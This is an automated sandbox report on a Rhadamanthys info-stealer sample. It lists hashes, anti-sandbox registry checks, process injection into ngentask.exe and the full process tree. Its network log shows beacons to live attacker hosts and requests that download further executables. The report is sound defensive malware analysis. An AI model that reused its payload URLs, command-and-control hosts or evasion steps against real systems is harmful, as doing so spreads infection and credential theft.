Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows10-1703_x64 -
resource
win10-20220901-en -
resource tags
arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system -
submitted
17/12/2022, 05:35 UTC
Static task
static1
Behavioral task
behavioral1
Sample
5c2f63b8821678ad4328e01f7b4512febdd8cff2ba762d6577744844514fbc3f.exe
Resource
win10-20220901-en
General
-
Target
5c2f63b8821678ad4328e01f7b4512febdd8cff2ba762d6577744844514fbc3f.exe
-
Size
214KB
-
MD5
e05542960134ab0160c8c7f7a17aca89
-
SHA1
58ece723af6a27e0125b846ea6b3edd5f64fe241
-
SHA256
5c2f63b8821678ad4328e01f7b4512febdd8cff2ba762d6577744844514fbc3f
-
SHA512
dc24e81ea1aee15e756347728914ee49b52ccb335ce1dc5e256d4e14a69ef1eb108aeb5067090edafb2c0fc1a8b8c7ecd8798a0c37721c79c5ea38c508f363e2
-
SSDEEP
3072:n5j8GLg0XpaaTR2R/5uxsppYxiq8LszNKq/o40zwUzQRKF+:5JLg0XMRY6Ip8gzUQo40M2b
Malware Config
Signatures
-
Detect rhadamanthys stealer shellcode 2 IoCs
resource yara_rule behavioral1/memory/4980-574-0x0000000001100000-0x000000000111D000-memory.dmp family_rhadamanthys behavioral1/memory/4140-594-0x00000000029C0000-0x00000000029DD000-memory.dmp family_rhadamanthys -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4308 created 2500 4308 6E5B.exe 34 -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
pid Process 1212 21EF.exe 4536 Eewfhetyyyrtfpd.exe 4308 6E5B.exe -
Deletes itself 1 IoCs
pid Process 2952 Process not Found -
Loads dropped DLL 1 IoCs
pid Process 4308 6E5B.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 4980 ngentask.exe 4980 ngentask.exe 4980 ngentask.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1212 set thread context of 4192 1212 21EF.exe 68 PID 4308 set thread context of 4980 4308 6E5B.exe 73 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\rescache\_merged\3720402701\2219095117.pri Process not Found -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 8 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ngentask.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ngentask.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 5c2f63b8821678ad4328e01f7b4512febdd8cff2ba762d6577744844514fbc3f.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 5c2f63b8821678ad4328e01f7b4512febdd8cff2ba762d6577744844514fbc3f.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 5c2f63b8821678ad4328e01f7b4512febdd8cff2ba762d6577744844514fbc3f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 ngentask.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID ngentask.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ngentask.exe -
Checks processor information in registry 2 TTPs 43 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz 21EF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status 21EF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 rundll32.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet 21EF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision 21EF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data 21EF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier 21EF.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier 21EF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 21EF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision 21EF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier 21EF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet 21EF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor 21EF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data 21EF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 21EF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 21EF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 21EF.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor 21EF.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 21EF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision 21EF.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 21EF.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 21EF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status 21EF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 21EF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information rundll32.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Process not Found Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\Toolbar Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" Process not Found -
Modifies registry class 20 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Process not Found Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance Process not Found Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 Process not Found Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff Process not Found Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 Process not Found Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" Process not Found Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell Process not Found Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 Process not Found -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2952 Process not Found -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 328 5c2f63b8821678ad4328e01f7b4512febdd8cff2ba762d6577744844514fbc3f.exe 328 5c2f63b8821678ad4328e01f7b4512febdd8cff2ba762d6577744844514fbc3f.exe 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found 2952 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2952 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 328 5c2f63b8821678ad4328e01f7b4512febdd8cff2ba762d6577744844514fbc3f.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4536 Eewfhetyyyrtfpd.exe Token: SeShutdownPrivilege 4980 ngentask.exe Token: SeCreatePagefilePrivilege 4980 ngentask.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 4536 Eewfhetyyyrtfpd.exe 4192 rundll32.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 4536 Eewfhetyyyrtfpd.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2952 Process not Found 2952 Process not Found -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2952 wrote to memory of 1212 2952 Process not Found 66 PID 2952 wrote to memory of 1212 2952 Process not Found 66 PID 2952 wrote to memory of 1212 2952 Process not Found 66 PID 1212 wrote to memory of 4536 1212 21EF.exe 67 PID 1212 wrote to memory of 4536 1212 21EF.exe 67 PID 1212 wrote to memory of 4536 1212 21EF.exe 67 PID 1212 wrote to memory of 4192 1212 21EF.exe 68 PID 1212 wrote to memory of 4192 1212 21EF.exe 68 PID 1212 wrote to memory of 4192 1212 21EF.exe 68 PID 1212 wrote to memory of 4192 1212 21EF.exe 68 PID 2952 wrote to memory of 4308 2952 Process not Found 70 PID 2952 wrote to memory of 4308 2952 Process not Found 70 PID 2952 wrote to memory of 4308 2952 Process not Found 70 PID 4308 wrote to memory of 656 4308 6E5B.exe 71 PID 4308 wrote to memory of 656 4308 6E5B.exe 71 PID 4308 wrote to memory of 656 4308 6E5B.exe 71 PID 4308 wrote to memory of 3988 4308 6E5B.exe 72 PID 4308 wrote to memory of 3988 4308 6E5B.exe 72 PID 4308 wrote to memory of 3988 4308 6E5B.exe 72 PID 4308 wrote to memory of 4980 4308 6E5B.exe 73 PID 4308 wrote to memory of 4980 4308 6E5B.exe 73 PID 4308 wrote to memory of 4980 4308 6E5B.exe 73 PID 4308 wrote to memory of 4980 4308 6E5B.exe 73 PID 4308 wrote to memory of 4980 4308 6E5B.exe 73 PID 4308 wrote to memory of 4140 4308 6E5B.exe 74 PID 4308 wrote to memory of 4140 4308 6E5B.exe 74 PID 4308 wrote to memory of 4140 4308 6E5B.exe 74 PID 4308 wrote to memory of 4140 4308 6E5B.exe 74
Processes
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵PID:2500
-
C:\Windows\SYSWOW64\fontview.exe"C:\Windows\SYSWOW64\fontview.exe"2⤵PID:4140
-
-
C:\Users\Admin\AppData\Local\Temp\5c2f63b8821678ad4328e01f7b4512febdd8cff2ba762d6577744844514fbc3f.exe"C:\Users\Admin\AppData\Local\Temp\5c2f63b8821678ad4328e01f7b4512febdd8cff2ba762d6577744844514fbc3f.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:328
-
C:\Users\Admin\AppData\Local\Temp\21EF.exeC:\Users\Admin\AppData\Local\Temp\21EF.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Users\Admin\AppData\Local\Temp\Eewfhetyyyrtfpd.exe"C:\Users\Admin\AppData\Local\Temp\Eewfhetyyyrtfpd.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4536
-
-
C:\Windows\syswow64\rundll32.exe"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#612⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:4192
-
-
C:\Users\Admin\AppData\Local\Temp\6E5B.exeC:\Users\Admin\AppData\Local\Temp\6E5B.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4308 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"2⤵PID:656
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"2⤵PID:3988
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:4980
-
Network
-
Remote address:8.8.8.8:53Requestdowe.atIN AResponsedowe.atIN A91.195.240.101
-
Remote address:91.195.240.101:80RequestPOST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qlcbvelr.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 233
Host: dowe.at
ResponseHTTP/1.1 403 Forbidden
content-type: text/html
content-length: 150
vary: Accept-Encoding
server: NginX
-
Remote address:8.8.8.8:53Requestxisac.comIN AResponsexisac.comIN A211.171.233.126xisac.comIN A181.94.48.228xisac.comIN A222.236.49.123xisac.comIN A138.36.3.134xisac.comIN A201.124.230.1xisac.comIN A190.219.54.242xisac.comIN A58.235.189.192xisac.comIN A109.102.255.230xisac.comIN A211.119.84.112xisac.comIN A37.34.248.24
-
Remote address:211.171.233.126:80RequestPOST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://oessper.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 368
Host: xisac.com
ResponseHTTP/1.0 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 8
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address:211.171.233.126:80RequestPOST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jkmitbrhc.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 160
Host: xisac.com
ResponseHTTP/1.0 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address:211.171.233.126:80RequestPOST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qioqgbmo.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 362
Host: xisac.com
ResponseHTTP/1.0 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address:211.171.233.126:80RequestPOST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jbexoomcu.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 322
Host: xisac.com
ResponseHTTP/1.0 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address:211.171.233.126:80RequestPOST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gvavmx.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 158
Host: xisac.com
ResponseHTTP/1.0 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 42
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address:149.3.170.140:80RequestGET /rokki.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 149.3.170.140
ResponseHTTP/1.1 200 OK
Date: Sat, 17 Dec 2022 05:36:07 GMT
Content-Type: application/octet-stream
Content-Length: 5848576
Last-Modified: Sat, 17 Dec 2022 05:30:02 GMT
Connection: keep-alive
ETag: "639d53da-593e00"
Accept-Ranges: bytes
-
Remote address:211.171.233.126:80RequestPOST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ubdjjvai.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 132
Host: xisac.com
ResponseHTTP/1.0 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address:211.171.233.126:80RequestPOST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://arggql.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 309
Host: xisac.com
ResponseHTTP/1.0 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address:211.171.233.126:80RequestPOST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ryjtwlihhh.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 326
Host: xisac.com
ResponseHTTP/1.0 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address:211.171.233.126:80RequestPOST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://orocfopgy.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 228
Host: xisac.com
ResponseHTTP/1.0 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address:211.171.233.126:80RequestPOST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://yjkouhsq.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 358
Host: xisac.com
ResponseHTTP/1.0 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address:211.171.233.126:80RequestPOST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://vcjpawlhrr.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 277
Host: xisac.com
ResponseHTTP/1.0 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address:211.171.233.126:80RequestPOST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ksoowwijrc.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 167
Host: xisac.com
ResponseHTTP/1.0 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 47
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address:8.8.8.8:53Requestcrazytree0021.gaIN AResponsecrazytree0021.gaIN A67.223.118.49
-
Remote address:8.8.8.8:53Requestcrazytree0021.gaIN AResponsecrazytree0021.gaIN A67.223.118.49
-
Remote address:67.223.118.49:80RequestGET /Install.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: crazytree0021.ga
ResponseHTTP/1.1 301 Moved Permanently
content-type: text/html
content-length: 707
date: Sat, 17 Dec 2022 05:36:25 GMT
server: LiteSpeed
location: https://crazytree0021.ga/Install.exe
x-turbo-charged-by: LiteSpeed
-
Remote address:67.223.118.49:443RequestGET /Install.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: crazytree0021.ga
ResponseHTTP/1.1 200 OK
content-type: application/x-msdownload
last-modified: Fri, 16 Dec 2022 21:30:54 GMT
accept-ranges: bytes
content-length: 1425552
date: Sat, 17 Dec 2022 05:36:26 GMT
server: LiteSpeed
